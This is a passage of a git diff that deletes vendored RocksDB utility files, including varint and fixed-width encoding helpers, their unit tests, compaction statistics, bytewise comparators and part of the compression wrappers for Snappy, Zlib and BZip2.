-  return reinterpret_cast<char*>(ptr);
-}
-
-inline void PutVarint64(std::string* dst, uint64_t v) {
-  char buf[10];
-  char* ptr = EncodeVarint64(buf, v);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint64Varint64(std::string* dst, uint64_t v1, uint64_t v2) {
-  char buf[20];
-  char* ptr = EncodeVarint64(buf, v1);
-  ptr = EncodeVarint64(ptr, v2);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint64(std::string* dst, uint32_t v1, uint64_t v2) {
-  char buf[15];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint64(ptr, v2);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutVarint32Varint32Varint64(std::string* dst, uint32_t v1,
-                                        uint32_t v2, uint64_t v3) {
-  char buf[20];
-  char* ptr = EncodeVarint32(buf, v1);
-  ptr = EncodeVarint32(ptr, v2);
-  ptr = EncodeVarint64(ptr, v3);
-  dst->append(buf, static_cast<size_t>(ptr - buf));
-}
-
-inline void PutLengthPrefixedSlice(std::string* dst, const Slice& value) {
-  PutVarint32(dst, static_cast<uint32_t>(value.size()));
-  dst->append(value.data(), value.size());
-}
-
-inline void PutLengthPrefixedSliceParts(std::string* dst,
-                                        const SliceParts& slice_parts) {
-  size_t total_bytes = 0;
-  for (int i = 0; i < slice_parts.num_parts; ++i) {
-    total_bytes += slice_parts.parts[i].size();
-  }
-  PutVarint32(dst, static_cast<uint32_t>(total_bytes));
-  for (int i = 0; i < slice_parts.num_parts; ++i) {
-    dst->append(slice_parts.parts[i].data(), slice_parts.parts[i].size());
-  }
-}
-
-inline int VarintLength(uint64_t v) {
-  int len = 1;
-  while (v >= 128) {
-    v >>= 7;
-    len++;
-  }
-  return len;
-}
-
-inline bool GetFixed64(Slice* input, uint64_t* value) {
-  if (input->size() < sizeof(uint64_t)) {
-    return false;
-  }
-  *value = DecodeFixed64(input->data());
-  input->remove_prefix(sizeof(uint64_t));
-  return true;
-}
-
-inline bool GetFixed32(Slice* input, uint32_t* value) {
-  if (input->size() < sizeof(uint32_t)) {
-    return false;
-  }
-  *value = DecodeFixed32(input->data());
-  input->remove_prefix(sizeof(uint32_t));
-  return true;
-}
-
-inline bool GetVarint32(Slice* input, uint32_t* value) {
-  const char* p = input->data();
-  const char* limit = p + input->size();
-  const char* q = GetVarint32Ptr(p, limit, value);
-  if (q == nullptr) {
-    return false;
-  } else {
-    *input = Slice(q, static_cast<size_t>(limit - q));
-    return true;
-  }
-}
-
-inline bool GetVarint64(Slice* input, uint64_t* value) {
-  const char* p = input->data();
-  const char* limit = p + input->size();
-  const char* q = GetVarint64Ptr(p, limit, value);
-  if (q == nullptr) {
-    return false;
-  } else {
-    *input = Slice(q, static_cast<size_t>(limit - q));
-    return true;
-  }
-}
-
-// Provide an interface for platform independent endianness transformation
-inline uint64_t EndianTransform(uint64_t input, size_t size) {
-  char* pos = reinterpret_cast<char*>(&input);
-  uint64_t ret_val = 0;
-  for (size_t i = 0; i < size; ++i) {
-    ret_val |= (static_cast<uint64_t>(static_cast<unsigned char>(pos[i]))
-                << ((size - i - 1) << 3));
-  }
-  return ret_val;
-}
-
-inline bool GetLengthPrefixedSlice(Slice* input, Slice* result) {
-  uint32_t len = 0;
-  if (GetVarint32(input, &len) && input->size() >= len) {
-    *result = Slice(input->data(), len);
-    input->remove_prefix(len);
-    return true;
-  } else {
-    return false;
-  }
-}
-
-inline Slice GetLengthPrefixedSlice(const char* data) {
-  uint32_t len = 0;
-  // +5: we assume "data" is not corrupted
-  // unsigned char is 7 bits, uint32_t is 32 bits, need 5 unsigned char
-  auto p = GetVarint32Ptr(data, data + 5 /* limit */, &len);
-  return Slice(p, len);
-}
-
-inline Slice GetSliceUntil(Slice* slice, char delimiter) {
-  uint32_t len = 0;
-  for (len = 0; len < slice->size() && slice->data()[len] != delimiter; ++len) {
-    // nothing
-  }
-
-  Slice ret(slice->data(), len);
-  slice->remove_prefix(len + ((len < slice->size()) ? 1 : 0));
-  return ret;
-}
-
-template<class T>
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("alignment")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-inline void PutUnaligned(T *memory, const T &value) {
-#if defined(PLATFORM_UNALIGNED_ACCESS_NOT_ALLOWED)
-  char *nonAlignedMemory = reinterpret_cast<char*>(memory);
-  memcpy(nonAlignedMemory, reinterpret_cast<const char*>(&value), sizeof(T));
-#else
-  *memory = value;
-#endif
-}
-
-template<class T>
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("alignment")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-inline void GetUnaligned(const T *memory, T *value) {
-#if defined(PLATFORM_UNALIGNED_ACCESS_NOT_ALLOWED)
-  char *nonAlignedMemory = reinterpret_cast<char*>(value);
-  memcpy(nonAlignedMemory, reinterpret_cast<const char*>(memory), sizeof(T));
-#else
-  *value = *memory;
-#endif
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/coding_test.cc b/thirdparty/rocksdb/util/coding_test.cc
deleted file mode 100644
index 49fb73d..0000000
--- a/thirdparty/rocksdb/util/coding_test.cc
+++ /dev/null
@@ -1,204 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "util/coding.h"
-
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class Coding { };
-
-TEST(Coding, Fixed32) {
-  std::string s;
-  for (uint32_t v = 0; v < 100000; v++) {
-    PutFixed32(&s, v);
-  }
-
-  const char* p = s.data();
-  for (uint32_t v = 0; v < 100000; v++) {
-    uint32_t actual = DecodeFixed32(p);
-    ASSERT_EQ(v, actual);
-    p += sizeof(uint32_t);
-  }
-}
-
-TEST(Coding, Fixed64) {
-  std::string s;
-  for (int power = 0; power <= 63; power++) {
-    uint64_t v = static_cast<uint64_t>(1) << power;
-    PutFixed64(&s, v - 1);
-    PutFixed64(&s, v + 0);
-    PutFixed64(&s, v + 1);
-  }
-
-  const char* p = s.data();
-  for (int power = 0; power <= 63; power++) {
-    uint64_t v = static_cast<uint64_t>(1) << power;
-    uint64_t actual = 0;
-    actual = DecodeFixed64(p);
-    ASSERT_EQ(v-1, actual);
-    p += sizeof(uint64_t);
-
-    actual = DecodeFixed64(p);
-    ASSERT_EQ(v+0, actual);
-    p += sizeof(uint64_t);
-
-    actual = DecodeFixed64(p);
-    ASSERT_EQ(v+1, actual);
-    p += sizeof(uint64_t);
-  }
-}
-
-// Test that encoding routines generate little-endian encodings
-TEST(Coding, EncodingOutput) {
-  std::string dst;
-  PutFixed32(&dst, 0x04030201);
-  ASSERT_EQ(4U, dst.size());
-  ASSERT_EQ(0x01, static_cast<int>(dst[0]));
-  ASSERT_EQ(0x02, static_cast<int>(dst[1]));
-  ASSERT_EQ(0x03, static_cast<int>(dst[2]));
-  ASSERT_EQ(0x04, static_cast<int>(dst[3]));
-
-  dst.clear();
-  PutFixed64(&dst, 0x0807060504030201ull);
-  ASSERT_EQ(8U, dst.size());
-  ASSERT_EQ(0x01, static_cast<int>(dst[0]));
-  ASSERT_EQ(0x02, static_cast<int>(dst[1]));
-  ASSERT_EQ(0x03, static_cast<int>(dst[2]));
-  ASSERT_EQ(0x04, static_cast<int>(dst[3]));
-  ASSERT_EQ(0x05, static_cast<int>(dst[4]));
-  ASSERT_EQ(0x06, static_cast<int>(dst[5]));
-  ASSERT_EQ(0x07, static_cast<int>(dst[6]));
-  ASSERT_EQ(0x08, static_cast<int>(dst[7]));
-}
-
-TEST(Coding, Varint32) {
-  std::string s;
-  for (uint32_t i = 0; i < (32 * 32); i++) {
-    uint32_t v = (i / 32) << (i % 32);
-    PutVarint32(&s, v);
-  }
-
-  const char* p = s.data();
-  const char* limit = p + s.size();
-  for (uint32_t i = 0; i < (32 * 32); i++) {
-    uint32_t expected = (i / 32) << (i % 32);
-    uint32_t actual = 0;
-    const char* start = p;
-    p = GetVarint32Ptr(p, limit, &actual);
-    ASSERT_TRUE(p != nullptr);
-    ASSERT_EQ(expected, actual);
-    ASSERT_EQ(VarintLength(actual), p - start);
-  }
-  ASSERT_EQ(p, s.data() + s.size());
-}
-
-TEST(Coding, Varint64) {
-  // Construct the list of values to check
-  std::vector<uint64_t> values;
-  // Some special values
-  values.push_back(0);
-  values.push_back(100);
-  values.push_back(~static_cast<uint64_t>(0));
-  values.push_back(~static_cast<uint64_t>(0) - 1);
-  for (uint32_t k = 0; k < 64; k++) {
-    // Test values near powers of two
-    const uint64_t power = 1ull << k;
-    values.push_back(power);
-    values.push_back(power-1);
-    values.push_back(power+1);
-  };
-
-  std::string s;
-  for (unsigned int i = 0; i < values.size(); i++) {
-    PutVarint64(&s, values[i]);
-  }
-
-  const char* p = s.data();
-  const char* limit = p + s.size();
-  for (unsigned int i = 0; i < values.size(); i++) {
-    ASSERT_TRUE(p < limit);
-    uint64_t actual = 0;
-    const char* start = p;
-    p = GetVarint64Ptr(p, limit, &actual);
-    ASSERT_TRUE(p != nullptr);
-    ASSERT_EQ(values[i], actual);
-    ASSERT_EQ(VarintLength(actual), p - start);
-  }
-  ASSERT_EQ(p, limit);
-
-}
-
-TEST(Coding, Varint32Overflow) {
-  uint32_t result;
-  std::string input("\x81\x82\x83\x84\x85\x11");
-  ASSERT_TRUE(GetVarint32Ptr(input.data(), input.data() + input.size(), &result)
-              == nullptr);
-}
-
-TEST(Coding, Varint32Truncation) {
-  uint32_t large_value = (1u << 31) + 100;
-  std::string s;
-  PutVarint32(&s, large_value);
-  uint32_t result;
-  for (unsigned int len = 0; len < s.size() - 1; len++) {
-    ASSERT_TRUE(GetVarint32Ptr(s.data(), s.data() + len, &result) == nullptr);
-  }
-  ASSERT_TRUE(
-      GetVarint32Ptr(s.data(), s.data() + s.size(), &result) != nullptr);
-  ASSERT_EQ(large_value, result);
-}
-
-TEST(Coding, Varint64Overflow) {
-  uint64_t result;
-  std::string input("\x81\x82\x83\x84\x85\x81\x82\x83\x84\x85\x11");
-  ASSERT_TRUE(GetVarint64Ptr(input.data(), input.data() + input.size(), &result)
-              == nullptr);
-}
-
-TEST(Coding, Varint64Truncation) {
-  uint64_t large_value = (1ull << 63) + 100ull;
-  std::string s;
-  PutVarint64(&s, large_value);
-  uint64_t result;
-  for (unsigned int len = 0; len < s.size() - 1; len++) {
-    ASSERT_TRUE(GetVarint64Ptr(s.data(), s.data() + len, &result) == nullptr);
-  }
-  ASSERT_TRUE(
-      GetVarint64Ptr(s.data(), s.data() + s.size(), &result) != nullptr);
-  ASSERT_EQ(large_value, result);
-}
-
-TEST(Coding, Strings) {
-  std::string s;
-  PutLengthPrefixedSlice(&s, Slice(""));
-  PutLengthPrefixedSlice(&s, Slice("foo"));
-  PutLengthPrefixedSlice(&s, Slice("bar"));
-  PutLengthPrefixedSlice(&s, Slice(std::string(200, 'x')));
-
-  Slice input(s);
-  Slice v;
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ("", v.ToString());
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ("foo", v.ToString());
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ("bar", v.ToString());
-  ASSERT_TRUE(GetLengthPrefixedSlice(&input, &v));
-  ASSERT_EQ(std::string(200, 'x'), v.ToString());
-  ASSERT_EQ("", input.ToString());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/compaction_job_stats_impl.cc b/thirdparty/rocksdb/util/compaction_job_stats_impl.cc
deleted file mode 100644
index 1787e83..0000000
--- a/thirdparty/rocksdb/util/compaction_job_stats_impl.cc
+++ /dev/null
@@ -1,86 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/compaction_job_stats.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-
-void CompactionJobStats::Reset() {
-  elapsed_micros = 0;
-
-  num_input_records = 0;
-  num_input_files = 0;
-  num_input_files_at_output_level = 0;
-
-  num_output_records = 0;
-  num_output_files = 0;
-
-  is_manual_compaction = 0;
-
-  total_input_bytes = 0;
-  total_output_bytes = 0;
-
-  num_records_replaced = 0;
-
-  total_input_raw_key_bytes = 0;
-  total_input_raw_value_bytes = 0;
-
-  num_input_deletion_records = 0;
-  num_expired_deletion_records = 0;
-
-  num_corrupt_keys = 0;
-
-  file_write_nanos = 0;
-  file_range_sync_nanos = 0;
-  file_fsync_nanos = 0;
-  file_prepare_write_nanos = 0;
-
-  num_single_del_fallthru = 0;
-  num_single_del_mismatch = 0;
-}
-
-void CompactionJobStats::Add(const CompactionJobStats& stats) {
-  elapsed_micros += stats.elapsed_micros;
-
-  num_input_records += stats.num_input_records;
-  num_input_files += stats.num_input_files;
-  num_input_files_at_output_level += stats.num_input_files_at_output_level;
-
-  num_output_records += stats.num_output_records;
-  num_output_files += stats.num_output_files;
-
-  total_input_bytes += stats.total_input_bytes;
-  total_output_bytes += stats.total_output_bytes;
-
-  num_records_replaced += stats.num_records_replaced;
-
-  total_input_raw_key_bytes += stats.total_input_raw_key_bytes;
-  total_input_raw_value_bytes += stats.total_input_raw_value_bytes;
-
-  num_input_deletion_records += stats.num_input_deletion_records;
-  num_expired_deletion_records += stats.num_expired_deletion_records;
-
-  num_corrupt_keys += stats.num_corrupt_keys;
-
-  file_write_nanos += stats.file_write_nanos;
-  file_range_sync_nanos += stats.file_range_sync_nanos;
-  file_fsync_nanos += stats.file_fsync_nanos;
-  file_prepare_write_nanos += stats.file_prepare_write_nanos;
-
-  num_single_del_fallthru += stats.num_single_del_fallthru;
-  num_single_del_mismatch += stats.num_single_del_mismatch;
-}
-
-#else
-
-void CompactionJobStats::Reset() {}
-
-void CompactionJobStats::Add(const CompactionJobStats& stats) {}
-
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/comparator.cc b/thirdparty/rocksdb/util/comparator.cc
deleted file mode 100644
index f3148f7..0000000
--- a/thirdparty/rocksdb/util/comparator.cc
+++ /dev/null
@@ -1,130 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <algorithm>
-#include <memory>
-#include <stdint.h>
-#include "rocksdb/comparator.h"
-#include "rocksdb/slice.h"
-#include "port/port.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-Comparator::~Comparator() { }
-
-namespace {
-class BytewiseComparatorImpl : public Comparator {
- public:
-  BytewiseComparatorImpl() { }
-
-  virtual const char* Name() const override {
-    return "leveldb.BytewiseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return a.compare(b);
-  }
-
-  virtual bool Equal(const Slice& a, const Slice& b) const override {
-    return a == b;
-  }
-
-  virtual void FindShortestSeparator(std::string* start,
-                                     const Slice& limit) const override {
-    // Find length of common prefix
-    size_t min_length = std::min(start->size(), limit.size());
-    size_t diff_index = 0;
-    while ((diff_index < min_length) &&
-           ((*start)[diff_index] == limit[diff_index])) {
-      diff_index++;
-    }
-
-    if (diff_index >= min_length) {
-      // Do not shorten if one string is a prefix of the other
-    } else {
-      uint8_t start_byte = static_cast<uint8_t>((*start)[diff_index]);
-      uint8_t limit_byte = static_cast<uint8_t>(limit[diff_index]);
-      if (start_byte >= limit_byte) {
-        // Cannot shorten since limit is smaller than start or start is
-        // already the shortest possible.
-        return;
-      }
-      assert(start_byte < limit_byte);
-
-      if (diff_index < limit.size() - 1 || start_byte + 1 < limit_byte) {
-        (*start)[diff_index]++;
-        start->resize(diff_index + 1);
-      } else {
-        //     v
-        // A A 1 A A A
-        // A A 2
-        //
-        // Incrementing the current byte will make start bigger than limit, we
-        // will skip this byte, and find the first non 0xFF byte in start and
-        // increment it.
-        diff_index++;
-
-        while (diff_index < start->size()) {
-          // Keep moving until we find the first non 0xFF byte to
-          // increment it
-          if (static_cast<uint8_t>((*start)[diff_index]) <
-              static_cast<uint8_t>(0xff)) {
-            (*start)[diff_index]++;
-            start->resize(diff_index + 1);
-            break;
-          }
-          diff_index++;
-        }
-      }
-      assert(Compare(*start, limit) < 0);
-    }
-  }
-
-  virtual void FindShortSuccessor(std::string* key) const override {
-    // Find first character that can be incremented
-    size_t n = key->size();
-    for (size_t i = 0; i < n; i++) {
-      const uint8_t byte = (*key)[i];
-      if (byte != static_cast<uint8_t>(0xff)) {
-        (*key)[i] = byte + 1;
-        key->resize(i+1);
-        return;
-      }
-    }
-    // *key is a run of 0xffs.  Leave it alone.
-  }
-};
-
-class ReverseBytewiseComparatorImpl : public BytewiseComparatorImpl {
- public:
-  ReverseBytewiseComparatorImpl() { }
-
-  virtual const char* Name() const override {
-    return "rocksdb.ReverseBytewiseComparator";
-  }
-
-  virtual int Compare(const Slice& a, const Slice& b) const override {
-    return -a.compare(b);
-  }
-};
-
-}// namespace
-
-const Comparator* BytewiseComparator() {
-  static BytewiseComparatorImpl bytewise;
-  return &bytewise;
-}
-
-const Comparator* ReverseBytewiseComparator() {
-  static ReverseBytewiseComparatorImpl rbytewise;
-  return &rbytewise;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/compression.h b/thirdparty/rocksdb/util/compression.h
deleted file mode 100644
index 468b961..0000000
--- a/thirdparty/rocksdb/util/compression.h
+++ /dev/null
@@ -1,791 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-#pragma once
-
-#include <algorithm>
-#include <limits>
-#include <string>
-
-#include "rocksdb/options.h"
-#include "util/coding.h"
-
-#ifdef SNAPPY
-#include <snappy.h>
-#endif
-
-#ifdef ZLIB
-#include <zlib.h>
-#endif
-
-#ifdef BZIP2
-#include <bzlib.h>
-#endif
-
-#if defined(LZ4)
-#include <lz4.h>
-#include <lz4hc.h>
-#endif
-
-#if defined(ZSTD)
-#include <zstd.h>
-#endif
-
-#if defined(XPRESS)
-#include "port/xpress.h"
-#endif
-
-namespace rocksdb {
-
-inline bool Snappy_Supported() {
-#ifdef SNAPPY
-  return true;
-#endif
-  return false;
-}
-
-inline bool Zlib_Supported() {
-#ifdef ZLIB
-  return true;
-#endif
-  return false;
-}
-
-inline bool BZip2_Supported() {
-#ifdef BZIP2
-  return true;
-#endif
-  return false;
-}
-
-inline bool LZ4_Supported() {
-#ifdef LZ4
-  return true;
-#endif
-  return false;
-}
-
-inline bool XPRESS_Supported() {
-#ifdef XPRESS
-  return true;
-#endif
-  return false;
-}
-
-inline bool ZSTD_Supported() {
-#ifdef ZSTD
-  // ZSTD format is finalized since version 0.8.0.
-  return (ZSTD_versionNumber() >= 800);
-#endif
-  return false;
-}
-
-inline bool ZSTDNotFinal_Supported() {
-#ifdef ZSTD
-  return true;
-#endif
-  return false;
-}
-
-inline bool CompressionTypeSupported(CompressionType compression_type) {
-  switch (compression_type) {
-    case kNoCompression:
-      return true;
-    case kSnappyCompression:
-      return Snappy_Supported();
-    case kZlibCompression:
-      return Zlib_Supported();
-    case kBZip2Compression:
-      return BZip2_Supported();
-    case kLZ4Compression:
-      return LZ4_Supported();
-    case kLZ4HCCompression:
-      return LZ4_Supported();
-    case kXpressCompression:
-      return XPRESS_Supported();
-    case kZSTDNotFinalCompression:
-      return ZSTDNotFinal_Supported();
-    case kZSTD:
-      return ZSTD_Supported();
-    default:
-      assert(false);
-      return false;
-  }
-}
-
-inline std::string CompressionTypeToString(CompressionType compression_type) {
-  switch (compression_type) {
-    case kNoCompression:
-      return "NoCompression";
-    case kSnappyCompression:
-      return "Snappy";
-    case kZlibCompression:
-      return "Zlib";
-    case kBZip2Compression:
-      return "BZip2";
-    case kLZ4Compression:
-      return "LZ4";
-    case kLZ4HCCompression:
-      return "LZ4HC";
-    case kXpressCompression:
-      return "Xpress";
-    case kZSTD:
-    case kZSTDNotFinalCompression:
-      return "ZSTD";
-    default:
-      assert(false);
-      return "";
-  }
-}
-
-// compress_format_version can have two values:
-// 1 -- decompressed sizes for BZip2 and Zlib are not included in the compressed
-// block. Also, decompressed sizes for LZ4 are encoded in platform-dependent
-// way.
-// 2 -- Zlib, BZip2 and LZ4 encode decompressed size as Varint32 just before the
-// start of compressed block. Snappy format is the same as version 1.
-
-inline bool Snappy_Compress(const CompressionOptions& opts, const char* input,
-                            size_t length, ::std::string* output) {
-#ifdef SNAPPY
-  output->resize(snappy::MaxCompressedLength(length));
-  size_t outlen;
-  snappy::RawCompress(input, length, &(*output)[0], &outlen);
-  output->resize(outlen);
-  return true;
-#endif
-
-  return false;
-}
-
-inline bool Snappy_GetUncompressedLength(const char* input, size_t length,
-                                         size_t* result) {
-#ifdef SNAPPY
-  return snappy::GetUncompressedLength(input, length, result);
-#else
-  return false;
-#endif
-}
-
-inline bool Snappy_Uncompress(const char* input, size_t length,
-                              char* output) {
-#ifdef SNAPPY
-  return snappy::RawUncompress(input, length, output);
-#else
-  return false;
-#endif
-}
-
-namespace compression {
-// returns size
-inline size_t PutDecompressedSizeInfo(std::string* output, uint32_t length) {
-  PutVarint32(output, length);
-  return output->size();
-}
-
-inline bool GetDecompressedSizeInfo(const char** input_data,
-                                    size_t* input_length,
-                                    uint32_t* output_len) {
-  auto new_input_data =
-      GetVarint32Ptr(*input_data, *input_data + *input_length, output_len);
-  if (new_input_data == nullptr) {
-    return false;
-  }
-  *input_length -= (new_input_data - *input_data);
-  *input_data = new_input_data;
-  return true;
-}
-}  // namespace compression
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline bool Zlib_Compress(const CompressionOptions& opts,
-                          uint32_t compress_format_version, const char* input,
-                          size_t length, ::std::string* output,
-                          const Slice& compression_dict = Slice()) {
-#ifdef ZLIB
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  }
-  // Resize output to be the plain data length.
-  // This may not be big enough if the compression actually expands data.
-  output->resize(output_header_len + length);
-
-  // The memLevel parameter specifies how much memory should be allocated for
-  // the internal compression state.
-  // memLevel=1 uses minimum memory but is slow and reduces compression ratio.
-  // memLevel=9 uses maximum memory for optimal speed.
-  // The default value is 8. See zconf.h for more details.
-  static const int memLevel = 8;
-  z_stream _stream;
-  memset(&_stream, 0, sizeof(z_stream));
-  int st = deflateInit2(&_stream, opts.level, Z_DEFLATED, opts.window_bits,
-                        memLevel, opts.strategy);
-  if (st != Z_OK) {
-    return false;
-  }
-
-  if (compression_dict.size()) {
-    // Initialize the compression library's dictionary
-    st = deflateSetDictionary(
-        &_stream, reinterpret_cast<const Bytef*>(compression_dict.data()),
-        static_cast<unsigned int>(compression_dict.size()));
-    if (st != Z_OK) {
-      deflateEnd(&_stream);
-      return false;
-    }
-  }
-
-  // Compress the input, and put compressed data in output.
-  _stream.next_in = (Bytef *)input;
-  _stream.avail_in = static_cast<unsigned int>(length);
-
-  // Initialize the output size.
-  _stream.avail_out = static_cast<unsigned int>(length);
-  _stream.next_out = reinterpret_cast<Bytef*>(&(*output)[output_header_len]);
-
-  bool compressed = false;
-  st = deflate(&_stream, Z_FINISH);
-  if (st == Z_STREAM_END) {
-    compressed = true;
-    output->resize(output->size() - _stream.avail_out);
-  }
-  // The only return value we really care about is Z_STREAM_END.
-  // Z_OK means insufficient output space. This means the compression is
-  // bigger than decompressed size. Just fail the compression in that case.
-
-  deflateEnd(&_stream);
-  return compressed;
-#endif
-  return false;
-}
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-// @param compression_dict Data for presetting the compression library's
-//    dictionary.
-inline char* Zlib_Uncompress(const char* input_data, size_t input_length,
-                             int* decompress_size,
-                             uint32_t compress_format_version,
-                             const Slice& compression_dict = Slice(),
-                             int windowBits = -14) {
-#ifdef ZLIB
-  uint32_t output_len = 0;
-  if (compress_format_version == 2) {
-    if (!compression::GetDecompressedSizeInfo(&input_data, &input_length,
-                                              &output_len)) {
-      return nullptr;
-    }
-  } else {
-    // Assume the decompressed data size will 5x of compressed size, but round
-    // to the page size
-    size_t proposed_output_len = ((input_length * 5) & (~(4096 - 1))) + 4096;
-    output_len = static_cast<uint32_t>(
-        std::min(proposed_output_len,
-                 static_cast<size_t>(std::numeric_limits<uint32_t>::max())));
-  }
-
-  z_stream _stream;
-  memset(&_stream, 0, sizeof(z_stream));
-
-  // For raw inflate, the windowBits should be -8..-15.
-  // If windowBits is bigger than zero, it will use either zlib
-  // header or gzip header. Adding 32 to it will do automatic detection.
-  int st = inflateInit2(&_stream,
-      windowBits > 0 ? windowBits + 32 : windowBits);
-  if (st != Z_OK) {
-    return nullptr;
-  }
-
-  if (compression_dict.size()) {
-    // Initialize the compression library's dictionary
-    st = inflateSetDictionary(
-        &_stream, reinterpret_cast<const Bytef*>(compression_dict.data()),
-        static_cast<unsigned int>(compression_dict.size()));
-    if (st != Z_OK) {
-      return nullptr;
-    }
-  }
-
-  _stream.next_in = (Bytef *)input_data;
-  _stream.avail_in = static_cast<unsigned int>(input_length);
-
-  char* output = new char[output_len];
-
-  _stream.next_out = (Bytef *)output;
-  _stream.avail_out = static_cast<unsigned int>(output_len);
-
-  bool done = false;
-  while (!done) {
-    st = inflate(&_stream, Z_SYNC_FLUSH);
-    switch (st) {
-      case Z_STREAM_END:
-        done = true;
-        break;
-      case Z_OK: {
-        // No output space. Increase the output space by 20%.
-        // We should never run out of output space if
-        // compress_format_version == 2
-        assert(compress_format_version != 2);
-        size_t old_sz = output_len;
-        uint32_t output_len_delta = output_len/5;
-        output_len += output_len_delta < 10 ? 10 : output_len_delta;
-        char* tmp = new char[output_len];
-        memcpy(tmp, output, old_sz);
-        delete[] output;
-        output = tmp;
-
-        // Set more output.
-        _stream.next_out = (Bytef *)(output + old_sz);
-        _stream.avail_out = static_cast<unsigned int>(output_len - old_sz);
-        break;
-      }
-      case Z_BUF_ERROR:
-      default:
-        delete[] output;
-        inflateEnd(&_stream);
-        return nullptr;
-    }
-  }
-
-  // If we encoded decompressed block size, we should have no bytes left
-  assert(compress_format_version != 2 || _stream.avail_out == 0);
-  *decompress_size = static_cast<int>(output_len - _stream.avail_out);
-  inflateEnd(&_stream);
-  return output;
-#endif
-
-  return nullptr;
-}
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-inline bool BZip2_Compress(const CompressionOptions& opts,
-                           uint32_t compress_format_version,
-                           const char* input, size_t length,
-                           ::std::string* output) {
-#ifdef BZIP2
-  if (length > std::numeric_limits<uint32_t>::max()) {
-    // Can't compress more than 4GB
-    return false;
-  }
-  size_t output_header_len = 0;
-  if (compress_format_version == 2) {
-    output_header_len = compression::PutDecompressedSizeInfo(
-        output, static_cast<uint32_t>(length));
-  }
-  // Resize output to be the plain data length.
-  // This may not be big enough if the compression actually expands data.
-  output->resize(output_header_len + length);
-
-
-  bz_stream _stream;
-  memset(&_stream, 0, sizeof(bz_stream));
-
-  // Block size 1 is 100K.
-  // 0 is for silent.
-  // 30 is the default workFactor
-  int st = BZ2_bzCompressInit(&_stream, 1, 0, 30);
-  if (st != BZ_OK) {
-    return false;
-  }
-
-  // Compress the input, and put compressed data in output.
-  _stream.next_in = (char *)input;
-  _stream.avail_in = static_cast<unsigned int>(length);
-
-  // Initialize the output size.
-  _stream.avail_out = static_cast<unsigned int>(length);
-  _stream.next_out = reinterpret_cast<char*>(&(*output)[output_header_len]);
-
-  bool compressed = false;
-  st = BZ2_bzCompress(&_stream, BZ_FINISH);
-  if (st == BZ_STREAM_END) {
-    compressed = true;
-    output->resize(output->size() - _stream.avail_out);
-  }
-  // The only return value we really care about is BZ_STREAM_END.
-  // BZ_FINISH_OK means insufficient output space. This means the compression
-  // is bigger than decompressed size. Just fail the compression in that case.
-
-  BZ2_bzCompressEnd(&_stream);
-  return compressed;
-#endif
-  return false;
-}
-
-// compress_format_version == 1 -- decompressed size is not included in the
-// block header
-// compress_format_version == 2 -- decompressed size is included in the block
-// header in varint32 format
-inline char* BZip2_Uncompress(const char* input_data, size_t input_length,
